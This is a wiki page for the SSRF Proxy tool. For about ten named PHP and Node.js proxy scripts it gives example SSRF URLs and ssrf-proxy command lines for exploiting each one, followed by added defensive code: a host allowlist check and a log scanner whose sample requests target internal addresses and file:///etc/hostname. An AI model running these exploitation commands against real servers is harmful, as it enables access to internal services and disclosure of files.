
Vulnerable Software

Brendan Coles edited this page Oct 16, 2016 · 11 revisions

This section contains SSRF Proxy usage patterns for known SSRF vulnerabilities.


PHProxy

PHProxy (aka Poxy) is a web HTTP proxy written in PHP. The index.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://poxy.local/poxy/index.php?q=http://example.com/&hl=1e9

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --forward-cookies --body-to-uri --auth-to-uri \
  --rules base64 \
  --url "http://poxy.local/poxy/index.php?q=xxURLxx&hl=1e9"
  • --guess-status can be used as the proxy returns the response.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • The hl=1e9 parameter tells PHProxy that the URL is base64 encoded, so --rules base64 is required.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • --forward-cookies can be used as the proxy has a cookie jar.

Glype

Glype is a web-based proxy script written in PHP. The browse.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://glype.local/glype/browse.php?u=http://example.com/&f=norefer&b=4

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --forward-method --forward-headers --forward-body \
  --cookie "s=<COOKIE>" \
  --url "http://glype.local/glype/browse.php?u=xxURLxx&f=norefer&b=4"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body. Note that this will also forward the s cookie to the destination host.
  • The proxy makes use of anti-hotlinking functionality. A cookie is required to access the proxy and must be provided like so: --cookie "s=<COOKIE>"
  • --forward-cookies can be used as the proxy has a cookie jar.

php-simple-proxy

php-simple-proxy is a simple proxy written in PHP which allows websites to bypass the same origin policy. The ba-simple-proxy.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://php-simple-proxy.local/ba-simple-proxy.php?url=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --forward-method --forward-headers --forward-body \
  --unescape \
  --match 'contents":"(.*)"}\z' \
  --url "http://php-simple-proxy.local/ba-simple-proxy.php?url=xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body.
  • --match 'contents":"(.*)"}\z' should be used to extract the response from the JSON output.
  • --unescape should be used as the output is escaped.

php-json-proxy

php-json-proxy is a simple proxy written in PHP which allows websites to bypass the same origin policy. The JsonProxy.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://php-json-proxy.local/JsonProxy.php?url=http://example.com/?json

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --forward-method --forward-headers --forward-body \
  --unescape \
  --match 'contents":"(.*)"}\z' \
  --url "http://php-json-proxy.local/JsonProxy.php?url=xxURLxx?.json"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body.
  • --match 'contents":"(.*)"}\z' should be used to extract the response from the JSON output.
  • --unescape should be used as the output is escaped.

miniProxy

miniProxy is a web-based proxy script written in PHP. The miniProxy.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://miniProxy.local/miniProxy/miniProxy.php/http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --forward-method --forward-headers --forward-body \
  --no-urlencode \
  --match '\}\)\(\);</script>(.+)' \
  --url "http://miniProxy.local/miniProxy/miniProxy.php/xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body.
  • --no-urlencode must be used as miniProxy does not support URL encoded request URLs.
  • --match '\}\)\(\);</script>(.+)' should be used to extract the response.

cors-proxy

cors-proxy is a simple proxy written in PHP which allows websites to bypass the same origin policy. The index.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://cors-proxy.local/cors-proxy/index.php?get=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --body-to-uri --cookies-to-uri --auth-to-uri \
  --url "http://cors-proxy.local/cors-proxy/index.php?get=xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • The default --match is sufficient as the response body contains only the HTTP response.

corsproxy

CORS Proxy is a simple proxy for Node.js which allows websites to bypass the same origin policy. By default, it binds to the local interface only.

Example SSRF

http://corsproxy.local:1337/example.com

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --body-to-uri --cookies-to-uri --auth-to-uri \
  --rules noproto \
  --no-urlencode \
  --url "http://corsproxy.local:1337/xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • --no-urlencode must be used as corsproxy does not support URL encoded request URLs.
  • --rules noproto must be used as corsproxy does not accept a URL scheme in the destination URL.

GeoNode

GeoNode features a proxy which allows unauthenticated users to perform SSRF. Allowed hosts can be restricted using PROXY_ALLOWED_HOSTS; however, this setting is ignored in debug mode (debug mode is enabled by default). All versions of GeoNode prior to commit 26c157e76cf9fa9d64a0763e9b353c64c2208a1f do not make use of host whitelisting at all.

Example SSRF

http://geonode.local/proxy/?url=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --body-to-uri --cookies-to-uri \
  --url 'http://geonode.local/proxy/?url=xxURLxx'
  • --guess-status can be used as the proxy returns the response.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • --auth-to-uri cannot be used as the proxy does not support authentication in URLs.
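The PROXY_ALLOWED_HOSTS note above describes the control a server-side fetch proxy needs and two ways it fails: the check is skipped in debug mode, or it is absent entirely. The following is an added example written for this page, not GeoNode's or SSRF Proxy's code; the allowlist contents, the function names and the two gate variants are assumptions made for illustration. It goes a little beyond the text by also rejecting URLs with embedded credentials, non-HTTP schemes and internal IP literals, which are the inputs the --auth-to-uri, --rules and related options above exercise.

```python
"""Host allowlisting for a server-side fetch proxy.

Added example for this page (not GeoNode's or SSRF Proxy's code). The
allowlist, the function names and the two gate variants are constructed
for illustration.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed sample allowlist: bare hostnames or IP literals, lowercase.
PROXY_ALLOWED_HOSTS = {"tiles.example.org", "wms.example.org"}


def _is_internal_literal(host: str) -> bool:
    """True if host is an IP literal in a loopback, link-local, private or reserved range."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False  # not an IP literal; hostnames are handled by the allowlist
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved


def destination_allowed(url: str, allowed_hosts=PROXY_ALLOWED_HOSTS) -> bool:
    """Decide whether the proxy may fetch `url`.

    Rejects anything that is not plain http/https, URLs carrying userinfo
    (the "user:pass@host" form that --auth-to-uri relies on), IP literals in
    internal ranges, and hosts outside the allowlist. The port is ignored for
    the allowlist match, but the bare host must match exactly.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False
    if not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname.lower()
    if _is_internal_literal(host):
        return False
    return host in allowed_hosts


def vulnerable_gate(url: str, debug: bool) -> bool:
    """The pattern the text warns about: the allowlist is bypassed when debug is on."""
    if debug:
        return True
    return destination_allowed(url)


def fixed_gate(url: str, debug: bool) -> bool:
    """Hardened form: the debug flag never changes the allowlist decision."""
    return destination_allowed(url)


if __name__ == "__main__":
    for candidate in ("http://tiles.example.org/a.png", "http://example.com/",
                      "http://user:pw@tiles.example.org/", "file:///etc/hostname"):
        print(f"{candidate!r:45} vulnerable(debug)={vulnerable_gate(candidate, True)} "
              f"fixed(debug)={fixed_gate(candidate, True)}")
```

The point of the two gate functions is that a debug flag must not be a code path around the allowlist; if debugging needs broader access, extend the allowlist explicitly rather than short-circuiting the check.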

simplecart-js

simplecart-js is a JavaScript based shopping cart. Although the software is written using client-side JavaScript, it comes bundled with test cases written in PHP which are vulnerable to file disclosure and SSRF.

Example SSRF

http://simplecartjs.local/simplecart-js/test/inc/get-raw-javascript.php?file=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --body-to-uri --cookies-to-uri --auth-to-uri \
  --url 'http://simplecartjs.local/simplecart-js/test/inc/get-raw-javascript.php?file=xxURLxx'
  • --guess-status can be used as the proxy returns the response.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.

Feed Proxy

Feed Proxy is a PHP based proxy for retrieving remote RSS feeds. It comes bundled with software (such as ExtJS) and is vulnerable to file disclosure and SSRF.

Example SSRF

http://feedproxy.local/extjs/examples/feed-viewer/feed-proxy.php?feed=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status \
  --body-to-uri --cookies-to-uri --auth-to-uri \
  --url 'http://feedproxy.local/extjs/examples/feed-viewer/feed-proxy.php?feed=xxURLxx'
  • --guess-status can be used as the proxy returns the response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • The default --match is sufficient as the response body contains only the HTTP response.
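Taken together, the example URLs above give a defender a concrete inventory of proxy endpoints and destination parameters to watch for in web server logs. The following is an added example, not part of SSRF Proxy or of any project listed on this page; the log lines are constructed samples in Common Log Format and the endpoint table is built from the example URLs in each entry. It handles the two encodings the entries call out: PHProxy's base64-encoded destination when hl=1e9 is set, and miniProxy's destination carried in the path rather than a query parameter.

```python
"""Flag requests to the proxy endpoints listed on this page in access logs.

Added example (not SSRF Proxy's code, nor any listed project's). The log
lines are constructed samples; the endpoint table comes from the example
URLs above.
"""
import base64
import binascii
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# (path suffix, query parameter carrying the destination), from the example
# URLs on this page. miniProxy puts the destination in the path instead.
PROXY_ENDPOINTS = [
    ("/poxy/index.php", "q"),                       # PHProxy
    ("/glype/browse.php", "u"),                     # Glype
    ("/ba-simple-proxy.php", "url"),                # php-simple-proxy
    ("/JsonProxy.php", "url"),                      # php-json-proxy
    ("/cors-proxy/index.php", "get"),               # cors-proxy
    ("/proxy/", "url"),                             # GeoNode
    ("/test/inc/get-raw-javascript.php", "file"),   # simplecart-js
    ("/feed-proxy.php", "feed"),                    # Feed Proxy
]
MINIPROXY = "/miniProxy.php/"

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def _internal_host(host: str) -> bool:
    """Loopback, link-local or private IP literal, or the literal name localhost."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local


def extract_destination(target: str):
    """Return (endpoint, destination URL) if `target` hits a listed proxy, else None."""
    parts = urlsplit(target)
    path = parts.path
    if MINIPROXY in path:
        # miniProxy: destination is the remainder of the path, not URL-encoded
        dest = path.split(MINIPROXY, 1)[1]
        if parts.query:
            dest += "?" + parts.query
        return ("miniProxy", dest)
    qs = parse_qs(parts.query)
    for suffix, param in PROXY_ENDPOINTS:
        if path.endswith(suffix) and param in qs:
            dest = qs[param][0]
            if suffix == "/poxy/index.php" and qs.get("hl", [""])[0] == "1e9":
                # PHProxy with hl=1e9: the destination is base64 encoded
                try:
                    dest = base64.b64decode(dest, validate=True).decode("utf-8", "replace")
                except (binascii.Error, ValueError):
                    pass  # undecodable; still report the raw hit
            return (suffix, dest)
    return None


def classify(line: str):
    """Return a finding dict for one log line, or None if it is not a proxy request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hit = extract_destination(m.group("target"))
    if hit is None:
        return None
    endpoint, dest = hit
    d = urlsplit(dest)
    host = (d.hostname or "").lower()
    if d.scheme.lower() not in ("http", "https"):
        severity = "high"   # file://, gopher:// and similar non-web schemes
    elif _internal_host(host):
        severity = "high"   # destination is loopback or an internal range
    else:
        severity = "info"   # proxy use to an external host: inventory only
    return {"src": m.group("ip"), "endpoint": endpoint, "dest": dest,
            "severity": severity, "status": m.group("status")}


def scan(log_text: str):
    """Run classify() over every line and keep the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


# Constructed sample log; the base64 value decodes to "http://10.0.0.5/".
SAMPLE_LOG = """\
203.0.113.7 - - [16/Oct/2016:10:00:01 +0000] "GET /glype/browse.php?u=http://example.com/&f=norefer&b=4 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Oct/2016:10:00:02 +0000] "GET /proxy/?url=http://127.0.0.1:8000/ HTTP/1.1" 200 812
203.0.113.7 - - [16/Oct/2016:10:00:03 +0000] "GET /poxy/index.php?q=aHR0cDovLzEwLjAuMC41Lw==&hl=1e9 HTTP/1.1" 200 301
203.0.113.7 - - [16/Oct/2016:10:00:04 +0000] "GET /miniProxy/miniProxy.php/file:///etc/hostname HTTP/1.1" 200 44
198.51.100.2 - - [16/Oct/2016:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the proxy scripts above return the upstream body with their own status code (the reason --guess-status is needed), the logged status is rarely informative on its own; the decoded destination is the field worth alerting on.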